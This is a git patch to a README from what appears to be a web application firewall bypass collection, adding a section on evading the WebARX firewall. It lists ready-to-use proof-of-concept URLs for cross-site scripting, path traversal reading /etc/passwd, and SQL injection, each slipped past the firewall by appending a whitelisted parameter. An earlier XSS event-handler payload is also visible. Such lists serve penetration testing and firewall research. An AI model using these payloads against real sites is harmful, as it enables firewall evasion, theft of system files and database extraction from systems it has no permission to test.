From de0c17045f8cc7fa5910132c1142bf79e04cb7cc Mon Sep 17 00:00:00 2001
From: Pinaki Mondal <theinfecteddrake@gmail.com>
Date: Sun, 13 Oct 2019 22:05:31 +0530
Subject: [PATCH] Added update for more webarx bypasses

---
 README.md | 14 ++++++++++++++
 1 file changed, 14 insertions(+)

diff --git a/README.md b/README.md
index 085869b..f392869 100644
--- a/README.md
+++ b/README.md
@@ -3707,6 +3707,20 @@ http://host.com/test.asp?file=.%./bla.txt
 ```
 <a69/onauxclick=open&#40&#41>rightclickhere
 ```
+- [Bypassing All Protections Using A Whitelist String](https://osandamalith.com/2019/10/12/bypassing-the-webarx-web-application-firewall-waf/) by [@Osanda Malith](https://twitter.com/OsandaMalith)
+
+    - XSS PoC
+    ```
+    http://host.com/?vulnparam=<script>alert()</script>&ithemes-sync-request
+    ```
+    - LFI PoC
+    ```
+    http://host.com/?vulnparam=../../../../../etc/passwd&ithemes-sync-request
+    ```
+    - SQLi PoC
+    ```
+    http://host.com/?vulnparam=1%20unionselect%20@@version,2--&ithemes-sync-request
+    ```
 
 ### WebKnight
 - Cross Site Scripting by [@WAFNinja](https://waf.ninja/)